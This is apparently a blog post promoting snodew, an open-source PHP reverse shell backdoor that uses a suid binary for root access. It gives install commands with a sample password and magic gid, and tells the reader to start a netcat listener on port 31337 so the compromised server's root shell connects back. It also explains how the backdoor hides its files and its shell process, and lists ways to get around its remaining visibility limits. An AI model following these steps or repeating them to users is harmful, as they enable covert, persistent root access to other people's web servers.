If you are in the unknown, there are multiple rootkits, malware sources mentioned in the malware sources page on this blog. The reason I mention this is because the author of the famous vlany rootkit has recently released a suid based PHP root reverse shell backdoor – snodew!
What is snodew?
snodew is an open source, PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection. As we know, suid is short for “set user ID upon execution”. It is originally meant to work alongside vlany, but can also be setup as a regular root backdoor. It requires root privileges for installation. Since snodew assumes that it is being installed with vlany, it tries to hide it’s files with extended attributes. It also uses the magic gid in suid bin to hide the /bin/sh process. Snodew can be helpful in maintaining access on a target that is inside a network and has a PHP web service running. This is possible. But in a well protected environment, suid will be disabled. Another problem is that if we do not use a rootkit along with this PHP shell backdoor, all that it does is visible. However, the author is aware of these problems and some more.
git clone https://github.com/mempodippy/snodew.git cd snodew/ ./setup.sh [install dir] [password] [hidden extended attribute] [magic gid]
example usage for regular (non-vlany infected) systems
cd /tmp git clone https://github.com/mempodippy/snodew.git cd snodew/ ./setup.sh /var/www/html/blog sexlovegod X 0 # 'X' and '0' since extended attribute doesn't really matter, # and our suid binary will set our gid to 0
After you check out the directory or copy the files to a host, you can run the script which places the shell in a location of your choice along with the hidden attribute. After this is done, you simply need to open up a listener like Netcat (nc -vlp 31337 😉 ) on the port you specify and wait for a connection!
Result of successful setup
Result after following instructions given on our new page
- requires a web service to be running on the box (along with php support for the service package)
- sh process spawned from service user is visible, though this could be subverted by checking /proc/self/cmdline and hiding the process if it contains the hidden suid bin
- if not being used alongside some kind of rootkit, everything you do is visible
- it's only a reverse shell
- when vlany is installed, simply su'ing to the service user won't allow them to see the files. vlany checks to see if an apache environment variable is also exported before giving access to the file, and does the same for nginx so that - by default - the file can only be accessed from a browser or from an owner shell
- exporting the apache environment variable that vlany checks, after su'ing to the service user will circumvent this
- suid possibly disabled
- not using 'exit' to exit the shell will leave the process spawned by the service in process lists (ps, top etc)